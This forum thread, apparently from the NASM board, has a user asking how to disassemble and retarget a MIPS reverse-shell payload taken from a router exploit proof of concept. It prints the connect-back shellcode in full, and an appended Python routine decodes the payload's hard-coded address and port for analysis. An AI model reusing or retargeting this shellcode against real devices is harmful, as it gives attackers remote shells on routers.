NASM - The Netwide Assembler

NASM Forum => Using NASM => Topic started by: mpmackenna on April 09, 2013, 04:03:16 PM

Title: Python shell machine code reversing
Post by: mpmackenna on April 09, 2013, 04:03:16 PM
I am attempting to edit a reverse shell that was coded by Zach Cutlip for an exploit he wrote for SOHO routers.  Here is a link to his source code project.
https://github.com/zcutlip/exploit-poc/tree/master/netgear/wndr3700v3
His reverse shell that is written in Python appears to contain what I believe is machine code for a MIPS-based piece of hardware.  The reverse shell specifies a reverse IP.  I would like to learn how to reverse his machine code so that I can recreate the shell and have it refer to a different reverse IP.
I looked through the documentation, but everything seemed to point to compiling assembly to make machine code, not the other way around.  Can someone please point me in the right direction?
Thanks,
Mike

Code:
connect_back=["\xfd\xff\x0f\x24\x27",
"x'20'", #SQL escape
"\xe0\x01\x27\x28\xe0\x01\xff\xff\x06\x28",
"\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f",
"\xfd\xff\x0f\x24\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x7a\x69\x0e\x3c",
"\x7a\x69\xce\x35\xe4\xff\xae\xaf\x0a\x0a",
"x'0d'", #SQL escape
"\x3c\x0a\x0a\xad\x35",
"\xe6\xff\xad\xaf\xe2\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01",
"\x4a\x10\x02\x24\x0c\x01\x01\x01\xfd\xff\x0f\x24\x27\x28\xe0\x01",
"\xff\xff\xa4\x8f\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa5",
"x'20'", #SQL escape
"\xff\xff\x01\x24\xfb\xff\xa1\x14\xff\xff\x06\x28\x62\x69\x0f\x3c",
"\x2f\x2f\xef\x35\xf4\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35",
"\xf8\xff\xae\xaf\xfc\xff\xa0\xaf\xf4\xff\xa4\x27\xd8\xff\xa4\xaf",
"\xff\xff\x05\x28\xdc\xff\xa5\xaf\xd8\xff\xa5\x27\xab\x0f\x02\x24",
"\x0c\x01\x01\x01\xff\xff\x06\x28"]

Update:  I have converted the machine code into MIPS assembly language using http://acade.au7.de/disasmips/disasmips.htm
Now I just need to learn how to read MIPS assembly language...
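
Added example (not part of the original post and not Zach Cutlip's code): for analysis, the connect-back address can be recovered by decoding the `lui`/`ori`/`sw` words in the middle of the payload and replaying their overlapping stack stores, which is how the code builds its `sockaddr_in`. The names `FRAGMENT`, `s16` and `recover_sockaddr` are hypothetical, and the code assumes little-endian MIPS and that the SQL escape `x'0d'` stands for the byte 0x0d.

```python
import socket
import struct

# Bytes copied from the middle of the posted payload (little-endian MIPS).
# Assumption: the SQL escape x'0d' stands for the single byte 0x0d.
FRAGMENT = (
    b"\xfd\xff\x0f\x24\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x7a\x69\x0e\x3c"
    b"\x7a\x69\xce\x35\xe4\xff\xae\xaf\x0a\x0a"
    b"\x0d"
    b"\x3c\x0a\x0a\xad\x35"
    b"\xe6\xff\xad\xaf"
)

def s16(value):
    """Sign-extend a 16-bit immediate."""
    return value - 0x10000 if value & 0x8000 else value

def recover_sockaddr(code):
    """Emulate the constant-building instructions and read back sockaddr_in."""
    regs = [0] * 32          # $sp (reg 29) stays 0, so stores are sp-relative
    stack = {}               # sp-relative offset -> byte value
    for (word,) in struct.iter_unpack("<I", code):
        op, rs, rt = word >> 26, (word >> 21) & 31, (word >> 16) & 31
        rd, funct, imm = (word >> 11) & 31, word & 63, word & 0xFFFF
        if op == 0x09:                       # addiu rt, rs, imm
            regs[rt] = (regs[rs] + s16(imm)) & 0xFFFFFFFF
        elif op == 0x0F:                     # lui rt, imm
            regs[rt] = imm << 16
        elif op == 0x0D:                     # ori rt, rs, imm
            regs[rt] = regs[rs] | imm
        elif op == 0 and funct == 0x27:      # nor rd, rs, rt
            regs[rd] = ~(regs[rs] | regs[rt]) & 0xFFFFFFFF
        elif op == 0x2B and rs == 29:        # sw rt, imm($sp)
            for i, byte in enumerate(struct.pack("<I", regs[rt])):
                stack[s16(imm) + i] = byte
        else:
            raise ValueError(f"unhandled instruction word {word:#010x}")
    base = min(stack)                        # lowest store = start of struct
    raw = bytes(stack[base + i] for i in range(8))
    family = struct.unpack_from("<H", raw)[0]      # host (little-endian) order
    port = struct.unpack_from(">H", raw, 2)[0]     # network byte order
    return family, port, socket.inet_ntoa(raw[4:8])

if __name__ == "__main__":
    print(recover_sockaddr(FRAGMENT))
```

The three stores overlap on purpose: each later `sw` overwrites the upper half of the previous word, which is why the port constant appears doubled in the `lui`/`ori` pair.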